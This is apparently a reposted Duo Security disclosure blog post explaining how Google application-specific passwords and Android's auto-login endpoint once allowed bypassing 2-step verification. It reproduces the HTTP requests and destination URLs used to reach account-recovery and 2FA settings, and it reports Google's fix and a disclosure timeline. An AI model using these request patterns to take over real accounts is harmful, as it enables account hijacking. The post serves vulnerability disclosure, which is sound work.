almost any of Google’s web properties and access privileged account interfaces, in a way that bypasses 2-step verification! Auto-Login with Chrome In recent versions of Android (and ChromeOS), Google has included, in their browser, an “auto-login” mechanism for Google accounts. After you’ve linked your device to a Google account, the browser will let you use your device’s existing authorization to skip Google’s web-based sign-on prompts. (There is even experimental support for this in desktop versions of Chrome; you can enable it by visiting chrome://flags/.) Until late last week, this auto-login mechanism worked even for the most sensitive parts of Google’s account-settings portal. This included the “Account recovery options” page, on which you can add or edit the email addresses and phone numbers to which Google might send password-reset messages. In short, if you can access the “Account recovery options” page for a Google account, then you can seize complete control of that account from its rightful owner. So, to recap: You can use an ASP to link an Android device (or Chromebook, etc.) to a Google account, and With that linked device, you could (until very recently) access the account’s recovery options (using auto-login to bypass any sign-on pages), change the password-reset settings, and gain full control over the account. This was enough for us to realize that ASPs presented some surprisingly-serious security threats, but we wanted to understand how the underlying mechanisms actually worked. Technical Details On his excellent Android Explorations blog, Nikolay Elenkov documented a rather in-depth investigation into the web auto-login mechanism on Android. This was a great starting point but still left a few gaps for our purposes. We wanted to learn how to exploit Google’s auto-login mechanism without using an Android device (or Chromebook, etc.) at all. To do this, we set up an an intercepting proxy with a custom CA certificate to watch the network traffic between an Android emulator instance and Google’s servers. When adding a Google account to the emulator (using an ASP), we saw the following request: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&add_account=1&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us?=en&sdk_version=17 The response body contained, among other things: Token=1/f1Hu... While the URL and some of the parameters aren’t documented, this very closely resembles the Google ClientLogin API. To recreate this request on our own, we’d need only to figure out what values to fill in for the EncryptedPasswd and androidId parameters. It turns out that androidId is simple; we’re confident in assuming it is the same “Android ID” mentioned in the Android API Docs: a randomly-generated 64-bit value that is intended to uniquely identify an Android device. Another of Elenkov’s blog posts led us to believe that EncryptedPasswd might be our ASP, encrypted with a 1024-bit RSA public key included in the Android system. EncryptedPasswd was, in fact, 130 bytes of (base64-encoded) binary data, so this seems quite possible. However, before digging too deeply into this, we decided to try replacing the EncryptedPasswd parameter with the (unencrypted) Passwd parameter from the ClientLogin API documentation, set to our ASP: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&add_account=1&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us?=en&sdk_version=17 This worked! Again, we got a response containing what appeared to be a valid Token. The token created by the android.clients.google.com endpoint was now visible in our account’s “Connected Sites, Apps, and Services” interface, appearing to offer “Full Account Access”: Continuing on with our captured traffic, we subsequently saw two different workflows for the browser’s auto-login functionality. The simpler of the two was another ClientLogin-style request, but using the returned Token: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&Token=1%2Ff1Hu...&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&source=android&androidId=3281f33679ccc6c6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81&device_country=us&operatorCountry=us?=en&sdk_version=17 This request returned a response body along the lines of: Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 From this request, we determined that the general format for the service parameter was weblogin:continue=url_encode(destination_url). We then decided to try specifying this service in our original request – i.e. with an ASP instead of the Token (and without trying to determine the provenance of an unknown client_sig parameter): POST /auth HTTP/1.1 Host: android.clients.google.com ... device_country=us&accountType=HOSTED_OR_GOOGLE&androidId=3281f33679ccc6c6&Email=user%40domain.com?=en&service=weblogin%3Acontinue%3Dhttps%253A%2F%2Faccounts.google.com%2FManageAccount&source=android&Passwd=xxxxxxxxxxxxxxxx&operatorCountry=us&sdk_version=17&has_permission=1 This returned us the same form of response: Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 That MergeSession URL is the key here. If you open it in an un-authenticated web browser after making this API call (you have to do this quickly; it has a very short expiration window), you will be immediately logged into your account settings page, with no authentication prompt! So: given nothing but a username, an ASP, and a single request to https://android.clients.google.com/auth, we can log into any Google web property without any login prompt (or 2-step verification)! Google’s Fix As we mentioned before, this worked on even the most sensitive sections of Google’s account-settings portal. An attacker could perform a variety of privileged actions using a victim’s ASP: An attacker could pass https://accounts.google.com/b/0/UpdateAccountRecoveryOptions?hl=en&service=oz as the destination URL in the API request, and the resulting MergeSession URL would take them immediately to the “Account recovery options” page, in which they could modify the password recovery email address to perform a reset of the victim’s master password. Similarly, an attacker could pass https://accounts.google.com/b/0/SmsAuthConfig?hl=en, and the resulting URL would take them to the settings for 2-step verification, in which they could create/edit ASPs, or turn off 2FA for the account altogether. This is no longer the case as of February 21st, when Google engineers pushed a fix to close this loophole. As far as we can tell, Google is now maintaining some per-session state to identify how you authenticated — did you log in using a MergeSession URL, or the normal username, password, 2-step verification flow? The account-settings portal will only allow you to access security-sensitive settings in the latter case (i.e. if you logged in using a MergeSession URL, it will give you a username/password/2-step-verification prompt that you can’t skip.) Was This So Bad? We think it’s a rather significant hole in a strong authentication system if a user still has some form of “password” that is sufficient to take over full control of his account. However, we’re still confident that — even before rolling out their fix — enabling Google’s 2-step verification was unequivocally better than not doing so. These days, attackers still have a lot of success using some very simple methods to take over accounts. For example, by: Creating a phishing site to trick users into giving up their passwords. Exploiting the fact that users often share passwords between sites, by cracking a (poorly-protected) password database from one site, and using the recovered passwords to attempt to break into users’ accounts on other sites. Both of these examples represent types of attacks that should be prevented simply by having users apply common sense and good digital hygiene – i.e. don’t use the same password on more than one site, and don’t click suspicious links in email messages. Unfortunately, this sort of “user education” program is something that rarely works well in practice (and might not even make economic sense). However, even with all-powerful ASPs, Google’s 2-step verification system should mitigate both of these types of attacks, even if users continue to do “stupid” things. Application-Specific Passwords are generated by Google, and not intended for users to memorize, so it’s extremely unlikely that a user might share one with other websites. Similarly, if a phishing site demanded users submit an Application-Specific Password, we imagine its success rate would be far lower (perhaps orders of magnitude lower) than normal. That said, all-powerful ASPs still carry some serious potential for harm. If an attacker can trick a user into running some malware, that malware might be able to find and extract an ASP somewhere on that user’s system (for example, Pidgin, a popular chat client often used with Google Talk, stores passwords in plaintext in an XML file). In addition, thick-client applications, the primary consumer of ASPs, are rather notorious for poor SSL certificate verification, potentially allowing ASPs to be captured on the wire via MITM attacks. Google’s fix helps this situation significantly. Though a compromised ASP could still inflict significant harm on a user, that user should ultimately retain control over his account (and the ability to revoke the ASP at the first sign something has gone wrong). However, we’re strong believers in the principle of least privilege, and we’d love to see Google implement some means to further-restrict the privileges of individual ASPs. Disclosure Timeline 2012/07/16: Duo researchers confirm presence of ASP weakness. 2012/07/18: Issue reported to security@google.com. 2012/07/20: Communication with Google Security Team clarifying the issue. 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team. 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces. 2013/02/25: Public disclosure by Duo. P.S. Inspired to enable two-factor authentication with your Google account? No need to download yet another app. We recently added third-party account support to Duo Mobile so now your work and personal accounts can all live in one place! Sursa: https://blog.duosecurity.com/2013/02/bypassing-googles-two-factor-authentication/